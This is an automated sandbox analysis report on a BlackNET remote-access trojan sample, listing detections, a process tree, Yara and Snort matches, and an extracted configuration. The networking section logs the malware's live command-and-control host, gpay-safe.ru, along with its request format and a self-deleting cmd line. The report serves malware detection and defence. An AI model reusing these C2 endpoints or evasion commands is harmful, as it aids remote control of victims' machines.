
Windows Analysis Report 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe

Overview

General Information

Sample Name: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Analysis ID: 471063
MD5: bc15770f9c1c0735cb5cc9d800476ab0
SHA1: 7700f53b4de7abcd0aa28a1989f73aad394b49bb
SHA256: 4054ee21cbfc210489f119c2d717ca1ae43129fc0d07aefe322fabb3b61d079f
Tags: BlackNET, exe

Detection

BlackNET
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected BlackNET
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
.NET source code contains potential unpacker
Uses ping.exe to sleep
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (PID: 4804 cmdline: 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 5936 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 7100 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
    • winhost.exe (PID: 6944 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
      • cmd.exe (PID: 7060 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 3028 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 6036 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6752 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
    • winhost.exe (PID: 4112 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
      • cmd.exe (PID: 5580 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6492 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • winhost.exe (PID: 7000 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 6984 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5668 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup

Malware Configuration

Threatname: BlackNET

{"Host": "http://gpay-safe.ru/x/", "ID": "HaCk", "Starup Name": "a5b002eacf54590ec8401ff6d3f920ee", "Install Name": "winhost.exe", "Install Dir": "Temp ", "Delay": "1000", "Version": "v3.6.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[vSqieqIW-9794388]"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | SUSP_Modified_SystemExeFileName_in_File | Detects a variant of a system file name often used by attackers to cloak their activity | Florian Roth
  • 0x110c6:$s1: svchosts.exe
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | MAL_Winnti_Sample_May18_1 | Detects malware sample from Burning Umbrella report - Generic Winnti Rule | Florian Roth
  • 0xe740:$s1: wireshark
  • 0xe6f6:$s2: procexp
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0xffc0:$s7: shutdown -r -t 00
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | HKTL_NET_GUID_BlackNET | Detects VB.NET red/black-team tools via typelibguid | Arnim Rupp
  • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
dropped/winhost.exe | SUSP_Modified_SystemExeFileName_in_File | Detects a variant of a system file name often used by attackers to cloak their activity | Florian Roth
  • 0x110c6:$s1: svchosts.exe
dropped/winhost.exe | MAL_Winnti_Sample_May18_1 | Detects malware sample from Burning Umbrella report - Generic Winnti Rule | Florian Roth
  • 0xe740:$s1: wireshark
  • 0xe6f6:$s2: procexp
dropped/winhost.exe | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0xffc0:$s7: shutdown -r -t 00
dropped/winhost.exe | HKTL_NET_GUID_BlackNET | Detects VB.NET red/black-team tools via typelibguid | Arnim Rupp
  • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
dropped/winhost.exe | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmp | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
(15 entries in total; the first 5 are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
19.2.winhost.exe.160000.0.unpack | SUSP_Modified_SystemExeFileName_in_File | Detects a variant of a system file name often used by attackers to cloak their activity | Florian Roth
  • 0x110c6:$s1: svchosts.exe
19.2.winhost.exe.160000.0.unpack | MAL_Winnti_Sample_May18_1 | Detects malware sample from Burning Umbrella report - Generic Winnti Rule | Florian Roth
  • 0xe740:$s1: wireshark
  • 0xe6f6:$s2: procexp
19.2.winhost.exe.160000.0.unpack | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0xffc0:$s7: shutdown -r -t 00
19.2.winhost.exe.160000.0.unpack | HKTL_NET_GUID_BlackNET | Detects VB.NET red/black-team tools via typelibguid | Arnim Rupp
  • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
19.2.winhost.exe.160000.0.unpack | JoeSecurity_BlackNET | Yara detected BlackNET | Joe Security
(45 entries in total; the first 5 are shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack | Malware Configuration Extractor: BlackNET {"Host": "http://gpay-safe.ru/x/", "ID": "HaCk", "Starup Name": "a5b002eacf54590ec8401ff6d3f920ee", "Install Name": "winhost.exe", "Install Dir": "Temp ", "Delay": "1000", "Version": "v3.6.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[vSqieqIW-9794388]"}
Multi AV Scanner detection for submitted file
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Virustotal: Detection: 68%
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Metadefender: Detection: 52%
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | ReversingLabs: Detection: 85%
Antivirus / Scanner detection for submitted sample
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Avira: detected
Multi AV Scanner detection for domain / URL
Source: gpay-safe.ru | Virustotal: Detection: 6%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Metadefender: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | ReversingLabs: Detection: 85%
Machine Learning detection for sample
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Joe Sandbox ML: detected
Source: 19.0.winhost.exe.160000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 16.0.winhost.exe.ae0000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 8.0.winhost.exe.720000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\Local\Temp\Microsoft\
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe:Zone.Identifier
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File opened: C:\Users\user\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49724 -> 91.206.93.216:80
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49725 -> 91.206.93.216:80
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49726 -> 91.206.93.216:80
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49727 -> 91.206.93.216:80
Source: Traffic | Snort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49730 -> 91.206.93.216:80
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://gpay-safe.ru/x/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: ASBAXETNRU ASBAXETNRU
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 1.1.1.1 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Aug 2021 22:49:10 GMT | Server: Apache/2.4.29 (Ubuntu) | Content-Length: 274 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.645343119.000000001BE94000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679709753.0000000002F6C000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.699597146.0000000002EA1000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru
Source: winhost.exe, winhost.exe, 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | String found in binary or memory: http://gpay-safe.ru/x/
Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQ
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQx
Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ
Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQx
Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ
Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp | String found in binary or memory: http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQx
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.646554695.000000001BECF000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.o
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.649141258.000000001BE94000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlx
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651883264.000000001BED7000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
